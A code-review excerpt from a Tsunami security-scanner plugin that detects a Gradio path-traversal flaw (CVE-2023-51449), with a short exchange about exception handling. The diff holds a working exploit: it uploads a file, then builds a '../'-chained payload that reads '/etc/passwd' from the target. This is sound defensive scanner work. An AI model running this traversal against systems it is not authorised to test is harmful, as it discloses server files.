community/detectors/gradio_cve_2023_51449/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202351449/Cve202351449VulnDetector.java

```diff
@@ -0,0 +1,268 @@
+            .setType(MultipartBody.FORM)
+            .addFormDataPart(
+                "files",
+                "tsunami_gradio_test.txt",
+                RequestBody.create(MediaType.parse("text/plain"), "Hello world"))
+            .build();
+    Buffer fileBuffer = new Buffer();
+    fileRequest.writeTo(fileBuffer);
+
+    return httpClient.send(
+        post(uploadUrl)
+            .setHeaders(
+                HttpHeaders.builder()
+                    .addHeader(CONTENT_TYPE, fileRequest.contentType().toString())
+                    .addHeader(USER_AGENT, "Tsunami Scanner")
+                    .build())
+            .setRequestBody(ByteString.copyFrom(fileBuffer.readByteArray()))
+            .build(),
+        networkService);
+  }
+
+  private String producePathTravesalPayload(String tmpFile) {
+    Path tmpFilePath = Path.of(tmpFile);
+    Path parentDir = tmpFilePath.getParent();
+    int subdirCount = parentDir.getNameCount();
+    StringBuilder payloadBuilder = new StringBuilder();
+    payloadBuilder.append(parentDir.toString());
+    for (int i = 0; i < subdirCount; i++) {
+      payloadBuilder.append("/..");
+    }
+    payloadBuilder.append("/etc/passwd");
+
+    return payloadBuilder.toString();
+  }
+
+  private HttpResponse sendGetFileRequest(NetworkService networkService, String payload)
+      throws IOException {
+    String fetchFileUrl = buildTarget(networkService).append(GET_FILE_PATH).toString() + payload;
+    return httpClient.sendAsIs(
+        HttpRequest.get(fetchFileUrl)
+            .setHeaders(HttpHeaders.builder().addHeader(USER_AGENT, "Tsunami Scanner").build())
+            .build());
+  }
+
+  private DetectionResult getDetectionResult(NetworkService networkService) {
+    try {
+      logger.atInfo().log("Attempting to upload a temporary file");
+      HttpResponse uploadResponse = sendUploadRequest(networkService);
+      if (uploadResponse.status().code() != HttpStatus.OK.code()) {
+        return DetectionResult.invulnerableForNetworkService(networkService);
+      }
+
+      JsonElement json = uploadResponse.bodyJson().get();
+      String tmpFile = json.getAsJsonArray().get(0).getAsString();
+      String ptPayload = producePathTravesalPayload(tmpFile);
+
+      logger.atInfo().log("Attempting to fetch arbitrary file");
+      HttpResponse getFileResponse = sendGetFileRequest(networkService, ptPayload);
+      String body = getFileResponse.bodyString().get();
+      if (getFileResponse.status().code() == HttpStatus.OK.code()
+          && body.contains(DETECTION_STRING)) {
+        return DetectionResult.builder()
+            .setIsVulnerable(true)
+            .setNetworkService(networkService)
+            .setFetchedFileContent(body)
+            .build();
+      }
+
+      return DetectionResult.invulnerableForNetworkService(networkService);
+    } catch (IOException e) {
+      return DetectionResult.invulnerableForNetworkService(networkService);
+    } catch (Exception e) {
```

Comment:
This catch block catches `Exception`, but can only catch unchecked exceptions. Consider catching RuntimeException (or something more specific) instead so it is more apparent that no checked exceptions are being handled.

```suggestion
    } catch (RuntimeException e) {
```

(fyi https://www.baeldung.com/java-checked-unchecked-exceptions)

Reply:
@vsutedjo done